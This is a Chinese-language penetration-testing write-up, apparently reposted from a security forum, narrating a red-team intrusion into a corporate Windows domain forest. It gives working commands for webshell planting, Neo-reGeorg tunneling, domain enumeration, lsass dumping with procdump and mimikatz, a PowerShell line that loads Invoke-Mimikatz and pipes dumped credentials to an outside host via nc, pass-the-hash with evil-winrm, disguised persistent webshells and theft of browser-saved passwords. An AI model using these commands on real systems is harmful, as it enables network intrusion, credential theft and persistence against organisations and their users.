初遇域林不知所措(一)

2020-02-20 约 167 字 预计阅读 1 分钟

声明:本文 【初遇域林不知所措(一)】 由作者 hosch3n 于 2020-02-20 08:46:15 首发 先知社区 曾经 浏览数 230 次

感谢 hosch3n 的辛苦付出!

初遇域林不知所措

  • 核心任务是拿到特定目标的数据,番外任务是域控和邮件服务器

如果是刷洞直接根据关键URL搜集目标就行了,针对目标就麻烦一点点。按流程走先作被动信息搜集,利用谷歌、微步、Shodan整理出目标的子域名、真实IP等资产信息

主动信息搜集前需要准备好梯子、肉鸡等用于流量中转与C2的服务器,跑字典爆一下可能尚未被收录的漏网子域名,nmap扫一下各IP段的各Web常用端口并记录关键字(方便后续找对应内网IP),如果某IP段存在大量目标Web服务器基本就是未来的内网入口了

试了一下发现用扫描器并不会被关小黑屋,于是上了大家喜闻乐见的以发包少速度快为宗旨的XRay,配合Crawlergo作主动爬虫食用更佳,参照官方文档即可愉快地相互配合跑起来(此处应有五毛广告费(//▽//))

刷新一下有结果了就开始冲冲冲,利用对应EXP写入webshell。whoami的结果是xxx-setup,看到前缀估计域环境有戏,执行ipconfig /allnet time /domain

再康康tasklist,除一些服务器进程外还有Chrome、企业版迈克菲,确定杀软后准备上线CS大干一场

Listener开起反向监听,Attacks->Web Drive-by->Scripted Web Delivery设置好PowerShell的Payload,远程加载走起~

然后。。。超时。。。再试试。。。超时。。。看着CS空荡荡的WebLog一脸蒙蔽。。。

ping一下必应试试。。。超时。。。谷歌。。。超时。。。

再康康netsh firewall show config,发现系统防火墙是关了的,但是被迈克菲统一接管了,基本可以确定出网流量被WAF拦截了。想了一下只可能传代理脚本走WebSocket进正向内网,起先一个个试了ABPTTS、Neo-reGeorg、reGeorg、reDuh都是报错,后来搜了一下报错发现是OpenSSL版本不匹配,高版本默认直接中断了某些安全性不够强的算法,降了下版本好了

python3 neoreg.py -k passwd -u https://URL -l 0.0.0.0 -p 8899 -vv

测试发现内网C段外的机器都禁ping了,接着开始扫描SMB、SSH、Web、RDP、FTP、NFS、Oracle、MSSQL、MySQL、Redis等服务

这里插播一下Tips,扫描可以用proxychains将nmap流量代理进内网扫描,也可以利用msf的隧道将auxiliary模块代理进内网扫描:

# vim /etc/proxychains.conf
    socks5 1.1.1.1 8899
# msfconsole
    setg Proxies socks5:1.1.1.1:8899
    setg ReverseAllowProxy true

在其它位置多留几个更隐蔽的webshell,比如将文件名、修改时间等作好伪装,时间久了被发现是迟早的事,如果还有火种就能再抢救一下不至于前功尽弃

扫描的同时继续看一下Shell机的信息,可以发现内网存在相当大的域林

type C:\Windows\System32\drivers\etc\hosts

arp -a                              网段活跃IP

netstat -nao                        网络连接

net view /domain                    域列表

net accounts /domain                域密码策略

net config workstation              本机所在域

net group /domain                   域用户组列表

net group "domain admins" /domain   域管列表

net user /domain                    域用户列表

net user "User_Name" /domain        特定域用户信息

systeminfo

wmic product

再插播一下,可能存在某个盘符打不开的情况,很有可能是光驱的盘符。有些新装系统除了C盘,其余盘符是安装好后才格式化出来的,这就导致了形如D这样的盘符提前被光驱占掉了。如果是自己的新电脑,看着不爽可以在格式化其它盘符之前将光驱驱动禁用释放出D盘符

接着上传procdump将hash扒下来,有GUI环境的可以通过任务管理器在进程上右键点击[Create dump file]

procdump.exe -ma lsass.exe lsass.dmp

# 本地mimikatz
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

网络实在太差可以通过webshell用免杀mimikatz非交互式读

mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit >> shash.txt

或是通过powershell版mimikatz直接远程读了传回来

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" | nc 1.1.1.1 9999

抓到NTLM后在cmd5查了一下只解出了本地管理员密码,域用户密码解不出。利用IPC共享和解出的管理员密码,配合SMB的扫描结果尝试挂载其它机器

net use z: \\IP\c$ "passwd" /user:"Administrator"

其中有一台目录结构与shell机几乎一模一样,刚开始猜测是负载均衡,但内网访问Web时会跳转回Shell机,接着又发现了另外几对这种双胞胎,综合考虑后觉得应该是灾备机,稳妥起见同样留个webshell

起初外网Web扫描时做好对应IP和端口的关键字标记,在内网横向打Web服务器时便可迅速对号入座,高效地扩大战果

IPC共享收割完后,使用抓到的域管NTLM利用pth(PassTheHash)继续收割,试了下Kali自带的几个不是很好用,threst师傅安利另外一个

proxychains evil-winrm.rb -i 1.1.1.1 -u username -H xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

利用powershell递归搜索特定后缀文件(dir -r *.xmls).FullName

如果各种config文件实在找不到Web文件夹绝对路径,可以找找log文件夹翻翻里面的访问日志看看能不能撞上相同目录结构

然而还是有很多aspx的站却找不到.aspx的文件,在IIS的默认页面放个静态文件测试C:\inetpub\wwwroot\1.html发现是可以解析的,但是直接写aspx的马却会间歇性404,后来了解到是sharepoint的锅。前阵子好像爆了个新洞,还没去看

扫尾读一下shell机上的chrome浏览器中保存的几个后台密码,还没来得及扒完横向到的机子的哈希就被蓝队撤换上了灾备的机子。。。连上之前留在灾备机上的马代理上流量继续冲冲冲,可能是因为把人家逼急了,第二天把最初的入口站直接整个下线了(:з」∠)

这样一来就索性避避风头,打打游戏种种地混吃等死休息一阵,萌新边打边学槽点满满的第一阶段告一段落

关键词:[‘渗透测试’, ‘渗透测试’]


author

旭达网络

旭达网络技术博客,曾记录各种技术问题,一贴搞定.
本文采用知识共享署名 4.0 国际许可协议进行许可。

We notice you're using an adblocker. If you like our webite please keep us running by whitelisting this site in your ad blocker. We’re serving quality, related ads only. Thank you!

I've whitelisted your website.

Not now